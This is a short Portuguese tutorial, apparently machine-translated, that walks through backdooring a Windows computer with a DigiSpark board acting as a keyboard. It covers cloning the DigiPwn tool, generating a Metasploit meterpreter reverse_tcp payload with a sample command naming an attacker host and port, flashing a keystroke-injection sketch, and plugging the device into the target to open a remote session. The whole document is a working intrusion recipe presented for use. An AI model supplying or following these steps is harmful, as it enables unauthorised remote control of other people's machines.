Índice:
2025 Autor: John Day | [email protected]. Última modificação: 2025-01-13 06:58
Então o que estamos fazendo aqui?
DigiSpark é uma pequena ferramenta de desenvolvimento baseada em Arduino que pode atuar como uma entrada de teclado HID. Hoje, manipulamos esse dispositivo para fazer backdoor em um sistema operacional Windows!
Suprimentos
IDE Arduino
Uma maquina windows
DigiSpark
Framework Metasploit
Python 2.7 (Observação: você precisa do python "2.7", não vá para nenhuma outra versão)
empacotar
Cérebro! Isso ajuda
Etapa 1: Clone o Repositório DigiPwn
Clone para o repositório GitHub do DigiPwn por
git clone
Agora mude o diretório para DigiPwn por
cd DigiPwn /
Etapa 2: instalar o Impacket [módulos exigidos pelo Python]
Este módulo é necessário para executar o servidor SMB, que é necessário para a biblioteca de carga útil
sudo apt-get install python-impacket
Ou você pode baixar a biblioteca impacket e instalá-la aqui.
Etapa 3: vamos gerar a carga útil
Corre
python DigiPwn.py [HOST] [PORT] [PAYLOAD] [OUTPUT FILE] [formato]
ex
python DigiPwn.py 192.168.1.2 8080 windows / meterpreter / reverse_tcp win.vbs win.vbs
Agora, você será questionado se deseja iniciar o servidor stager e SMB. Pressione y e pressione Enter
Etapa 4: Agora faça upload do código para o Arduino
Antes de fazer o upload, precisamos ter certeza de que a placa DigiSpark está instalada no Arduino para fazer isso aqui.
depois disso, faça upload do arquivo keystroke_inject.ino gerado pelo script. Uma vez feito isso, você está pronto para
Etapa 5: Hora de conectar o bebê
Conecte seu DigiSpark agora e aguarde 10 segundos
BOOM Há uma sessão de meterpreter aberta!